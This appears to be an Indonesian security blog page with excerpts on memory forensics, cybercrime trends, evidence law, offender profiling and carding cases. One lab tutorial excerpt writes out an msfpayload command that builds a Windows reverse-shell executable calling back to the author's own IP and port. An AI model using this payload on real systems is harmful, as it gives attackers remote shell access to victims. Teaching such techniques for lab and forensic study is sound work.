Soal Latihan RAM Forensik

Jam baru menunjukkan pukul 09.30 dan baru saja anda selesai menyeduh secangkir kopi untuk memulai aktivitas perdana di kantor baru, tiba-tiba anda mendapatkan laporan dari salah seorang sysadmin dikantor cabang yang mengatakan bahwa salah satu servernya terindikasi telah disusupi hacker. Hal ini dia ketahui setelah ia curiga terdapat perubahan di dalam systemnya. Sysadmin tersebut tidak mengetahui secara pasti bagaimana hacker bisa menyusup kedalam servernya.

Anda sebagai satu-satunya security analyst di perusahaan tersebut ( yang baru saja di rektrut dan sedang menjalani masa probation)
dipanggil untuk datang ke kantor cabang untuk melakukan remediasi atas insiden tersebut. Tugas anda adalah :

1. Temukan celah yang terdapat di server tersebut dan bagaimana hacker dapat menyusup ke dalam server tersebut
2. Temukan payloadnya.
3. Apakah perubahan yang telah dilakukan oleh hacker di server tersebut.
4. Apakah serangan ini dilakukan oleh orang dalam atau orang luar.
5. Apakah saran dan solusi anda agar serangan serupa tidak terjadi.

Kemampuan anda menyelesaikan insiden ini menentukan karir anda di perusahaan ini.

md5sum : 172f61f1b80cffd09705994f0f9df702
file : memdump.mem

Cyber crime trends

Tags

, ,

Cyber crime trends

Sumber 2012 2013 2014
RSA Trojan

  • SpyEye and variants
  • Trojan for mobile platform
  • Trojan targeting specific geographic
  • Banking Trojan

Cyber Criminal developing ways to targeting non financial Data

  • Utility Statement
  • Medical Record
  • Hacking user account i.e xbox account, facebook,etc
  • Access to infected Victim Computer
Mobile Threats

  • Mobile transaction
  • Phishing
  • SMS spoof
  • SMS Sniffing
  • Rogue Mobile Application

Trojan

  • Zeus Based Trojan
  • SpyEye
  • Bugat V2
  • Gozi
  • Carberp

Hacktivism

  • Distribute Denial of Service(DDOS)
  • Doxing
  • Hacking and Exposure

Cybercriminal will leveraging BigDataPrinciples to increase Effective of Attacks

Mobile Threats

  • Malicious app
  • Phishing
  • Adware
  • Spyware
  • Sms sniffer
  • Sms hijacking

Bitcoin Fraud

Malware

  • Botnets

Cyber espionage attack

Security Account

RSA merupakan sebuah perusahaan amerika yang fokus kepada kemanan , terutama tentang keamana dunia maya. Perusahaan ini menjadi partner dari perusahaan-perusahaan dunia karena mereka berhasil untuk menjawab tantangan-tantangan keamanan yang semakin berkembang dari tahun ke tahun dengan cara mengelola resiko, menjaga akses mobile, mengamankan dunia lingkungan virtual, dan menjaga perusahaan untuk meminimalisir resiko dari kejahatan dunia maya.

2012

Trojan

Pada tahun 2011 RSA mengumumkan laporan prediksi serangan cyber crime untuk 2012. Pada tahun 2012 “perang” dunia maya menggunakan Trojan masih berlangsung, terutama Trojan bernama zeus yang telah berkembang menjadi Zeus 2.0. Zeus merupakan Trojan yang menyerang bagian perbankan.

Trojan For Mobile Platform.

Dengan berkembangnya teknologi mobile pada tahun 2012 trojan dikembangakan untuk mencuri data pada mobile platform seperti “info stealer” untuk platform mobile yang di desain untuk mencuri input dan monitor, bahkan trafik data dari mobile phone. Continue reading

Penanganan Barang Bukti Forensik

Tags

, , , ,

Dalam suatu kasus persidangan untuk membuktikan seseoarng bersalah atau tidak bersalah selain menggunakan keterangan saksi, juga didukung dengan menggunakan barang bukti yang terdapat di tempat kejadian perkara. Namun tidak semua barang yang terdapat di tempat kejadian perkara merupakan barang bukti. Selain itu barang bukti juga rentan untuk dihilangkan atau disembunyikan, baik dari sengaja di hilangkan/ disembunyikan pihak pelaku atau dalam proses penyidikan. Sehingga barang bukti yang dibawa menjadi tidak asli atau sudah berubah dalam proses penyidikan. Sangatlah penting untuk menjaga keaslian barang bukti untuk bisa dihadirkan dalam persidangan.

PENGERTIAN BARANG BUKTI

  1. Menurut peraturan perundang-undangan.

Kitab Undang-undang Hukum Acara Pidana memang tidak menyebutkan secara jelas tentang apa yang dimaksud dengan barang bukti. Namun dalam Pasal 39 ayat (1) KUHAP disebutkan mengenai apa-apa saja yang dapat disita, yaitu:

  • benda atau tagihan tersangka atau terdakwa yang seluruh atau sebagian diduga diperoleh dari tindakan pidana atau sebagai hasil dari tindak pidana.
  • benda yang telah dipergunakan secara langsung untuk melakukan tindak pidana atau untuk mempersiapkannya.
  • benda yang digunakan untuk menghalang-halangi penyelidikan tindak pidana.
  • benda yang khusus dibuat atau diperuntukkan melakukan tindak pidana.
  • benda lain yang mempunyai hubungan langsung dengan tindak pidana yang dilakukan.

Dengan kata lain barang yang disita yang dimaksudkan dalam pasal 39 ayat (1) KUHAP dapat dijadikan sebagai barang bukti (Ratna Nurul Afiah, Barang Bukti Dalam Proses Pidana,hal. 14). Continue reading

Definisi dan Penjelasan Bukti Digital

Tags

, , ,

keberadaan barang bukti sangat penting dalam investigasi kasus-kasus dalam persidangan, barang bukti sangat strategis bagi investigator dan juga forensik analis. Bukti digital berbeda dengan bukti-bukti lainnya, karena bukti digital ini tidak kasat mata. maksudnya adalah perlu ada pengolahan data untuk mendapatkan bukti dari barang bukti digital.

jika dilihat dari sifat perangkat digital dapat dibedakan menjadi:

  • closed system : perangkat digital tersebut tidak terhubung dengan jaringan luar.
  • open system:  pernagkat digital terhubung dengan jaringan luar seperti internet, lan, wan, jaringan radio dll.

Walaupun bersifat p Continue reading

Sejarah Perkembangan Ilmu Forensik dan Digital Forensik

Tags

, , ,

Sejarah Ilmu Forensik dan Forensik Digital

Forensik dalam bahasa latin yaitu forensis yang artinya “dari luar” dan juga dekat dengan kata forum yang artinya tempat untuk melakukan transaksi. Ilmu forensik ini lebih dikenal masyarakat karena buku Sherlock Holmes yang terbit pada tahun 1887 , Holmes dan partnernya memecahkan kasus secara deduktif dan menggunakan pembuktian secara terbalik melalui ilmu pengetahuan. Namun sebelum tahun 1887 Ilmu forensik sudah banyak digunakan di berbagai bidang seperti :

  • Francis Galton (1822-1911) : sidik jari;
  • Mathieu Orfila (1787-1853) : melakukan sebuah riset tentang cara untuk mendeteksi racun (toksikologi forensik)
  • Leone Lattes (1887-1954) : Golongan darah (A,B,AB & O)
  • Calvin Goddard (1891-1955) : senjata dan peluru (Balistik)
  • Albert Osborn (1858-1946) : Document examination
  • Hans Gross (1847-1915) : menerapkan ilmiah dalam investigasi criminal

menurut para ahli di Indonesia forensik adalah :

  • Prof. Dr. W.M.E. NOACH : “Ilmu pengetahuan yang mempelajari kejahatan sebagai masalah tehnik sebagai alat untuk mengadakan penyidikan kejahatan secara tehnis dgn menggunakan ilmu-ilmu lain
  • GUMILANG : “Tehnik dan taktik untuk untuk membuat terang suatu perkara kejahatan dengan menggunakan ilmu-ilmu modern, atau tehnik penyidikan, mencari barang bukti, mencari tersangka”
  • SAMPURNA : “Penerapan atau pemanfaatan ilmu-ilmu alam pada pengenalan, pengumpulan / pengambilan, identifikasi, individualisasi, dan evaluasi dari bukti fisik, dgn gunakan metode / teknik ilmu alam didalam / utk kepentingan hukum / peradilan

Forensik merupakan suatu usaha untuk memeriksa atau mencari bukti, dengan proses metode Continue reading

Insider Computer Fraud ICF

Tags

, , ,

There are no definitive methods in existence today that can prevent ICF activities.” Oleh karena itu perlu adanya pemahaman tentang ICF supaya dapat memahami dan dapat meminimalisir kegiatan ICF dalam penanganan resiko.

pun aplikasi. Lebih rinci lagi adalah karyawan, kontraktor, konsultan, penyedia layanan, penyedia software, dsb.

Terdapat 3 kriteria sebuah tindakan sebagai tindak kejahatan ICF :

  • Secara sadar mengakses komputer
  • Menggunakan komputer tanpa otorisasi atau melebihi otorsisasi
  • Penggunaan komputer untuk melakukan tindak pidana dan atau penipuan.

Ancaman Insider merupakan masalah yang rumit dan sulit dipahami sehingga diperlukan pengurangan resiko dengan usaha yang lebih. Walaupun taksonomi ICF memiliki banyak jenis serangan ICF sebagian kecil adalah : Continue reading

Profilling pelaku kejahatan dunia maya

Tags

, , , ,

Biasanya bayangan kita sehari-hari dari seorang hacker adalah orang yang pintar, bisa dikatakan jenius, penyendiri, aneh, dan suka berlama-lama didepan komputer namun kurang baik dalam pergaulan sosial sekelilingnya. tetapi itu hanya terkaan kita yang mungkin muncul karena sering menonton televisi yang membuat image seperti itu.

padahal belum tentu seperti itu, karena seorang hacker atau penjahat dunia maya pada dasarnya sama seperti penjahat tradisional lainnya seperti pencuri biasa. mereka membutuhkan motivasi dan memiliki skill tertentu yang dapat mendorong mereka melakukan tindak kejahatan. Dari motivasi ini maka akan terbentuk bagaimana  mereka melakukan kejahatan, mulai dari mengintai target, dan apa yang membuat mereka melakukan kejahatan (trigger/ pemicunya).

Marcus Rogers seorang detektif di bidang unit kejahatan komputer di kanada dan peraih gelar doktor dalam bidang psikologi forensik di university of Manitoba telah mengidentifikasi 8 tipe pelaku kejahatan dunia maya (cybercriminal).

Novice

– memiliki ketreampilan dalam ilmu komputer dan pemograman yang terbatas.

– mengandalkan toolkit yang sudah ada untuk melakukan serangan.

– dapat mengakibatkan kerusakan yang luas, karena umumnya mereka tidak tau bagaimana serangan itu bekerja.

– mencari perhatian media

Continue reading

exploit windos xp menggunakan windows/shell_reverse_tcp

karena saya menggunakan Kali linux untuk melakukan exploitasi, ada baiknya untuk menginstall vmware player di kali linux. saya anggap sudah terinstall dan sudah terdapat sistem operasi windows xp didalamnnya seperti ini:

Screenshot from 2014-11-17 12:13:56

 

tahap kedua adalah membuat payload menggunakan windows/shell_reverse_tcp dengan mengetikkan :

msfpayload windows/shell_reverse_tcp LHOST=172.16.116.1 LPORT=1234 x> /root/Desktop/reverse.exe

payload : windoes/shell_reverse_tcp

LHOST : 172.16.116.1

LPORT : 1234

x : untuk membuat payload yang bisa melakukan execute, dengan kata lain file berbentuk .exe

/root/Desktop/reverse.exe : membuat file reverse.exe di Desktop

Screenshot from 2014-11-17 12:30:16

dimana msfpayload ini akan membuat aplikasi bernama reverse.exe degan ListeningHost 172.16.116.1 (IP saya) dengan port 1234..

Continue reading

Beberapa kasus Cyber Crime

Tags

, , , , , , ,

Kasus Penggunaan Kartu Kredit Illegal Via Online

yang serba elektronik ini memungkinkan manusia untuk bertransaksi tanpa menggunakan uang (cash), iya tanpa uang cash. salah satunya adalah dengan menggunakan kartu, bisa kartu kredit atau debet. namun, transaksi menggunakan layanan ini memiliki resiko yang besar, karena menggunakan elektronik, dan transmisi data memungkinkan untuk orang lain melakukan penyadapan.

Skenario Kejadian

Buy alias Sam, membeli beberapa barang dar luar negri yang didapat dari aksi carding dan merugikan beberapa pihak jerman sebesar Rp 70.000.000,0 . Dengan menggunakan kelemahan dari transaksi via kartu , pelaku carding melakukan aksinya untuk mencuri uang dari informasi kartu kredit orang lain yang digunakan untuk kepentingan pribadi. para korban tiba-tiba saja kehilangan sejumlah uang didalam akun bank, dimana korban ini tidak melakukan transaksi seperti yang dimaksudkan.

Hukum yangDilanggar

carding ini dimasukkan dalam kategori pencurian dengan menggunakan media elektronik, dalam UU ITE pasal 31 ayat 1 dan ayat 2 menjelaskan tentang hacking termasuk didalamnya mencuri identitas, informasi, maupun dokumen milik orang lain yang mengakibatkan perubahan, kehilangan, atau penghentian informasi elektronik  atau dokumen elektronik yang di transmisikan.

Pihak yang Terlibat

Kasus ini melibatkan orang dalam (biasanya bagian kasir) untuk meletakkan alat yang dapat menyimpan informasi di dalam alat untuk gesekaan kartu.

Motif

motif dari carding ini murni profit, dimana pelaku ingin melakukan transaksi secara “gratis”, baik untuk digunakan sendiri atau untuk dijual kembali. Continue reading

KEJAHATAN DUNIA MAYA :BLACK MARKET

Tags

, , , , , , , , , , ,

KEJAHATAN DUNIA MAYA :

BLACK MARKET

 Pendahuluan

Perkembangan Malware beberapa tahun lalu biasanya digunakan untuk mencuri kartu kredit, namun sekarang berkembang menjadi lebih jauh hingga mencuri profil pribadi seseorang. Hal ini terjadi karena ada penawaran dengan harga khusus yang membuat pelaku dunia maya merasa bisnis seperti ini masih menguntungkan. Bagaimana tidak, hanya dengan mencuri profil korban, dengan bayaran yang tinggi.


Gambar evolusi malware

Menurut laporan PandaLabs (Panda Security) , tiap tahun serangan malware semakin meningkat. Alasan mengapa terjadi peningkatan serangan malware ini hanya 1 yaitu profit. Malware terus berevolusi untuk menghindari terdeteksi dari antivirus. Setiap hari varian malware semakin canggih untuk menghindari dari keamanan yang terdapat di bank, toko online, platform berbayar ,dll.


Jenis malware pada tahun 2005

Pada umumnya Trojan,keylogger, dan bots digunakan untuk pencurian identitas. Pada tahun 2005 hampir setengah dari kode berbahaya (malware) merupakan Trojan dan sampai sekarang terus berkembang. Korbannya 99% merupakan pengguna windows karena system operasi ini paling banyak digunakan.

Bagaimana Black Market Bekerja

1. Profesi Cyber Crime

Ketika pertama kali mendengar Black Market / pasar gelap, tidak jarang orang membayangkan mafia, penjahat , mata-mata atau bahkan mungkin bajak laut daripada bagaimana kenyataan sesungguhnya. Menurut FBI, organisasi kejahatan duni maya beroperasi seperti perusahaan yang memiliki ahli khusus di setiap daerah dan posisi. Namun tanpa jadwal, dan hari libur. FBI mengklarifikasikan profesi-profesi umum yang biasanya menjadi pelaku kejahatan dunia maya/ mafia dunia maya.
Continue reading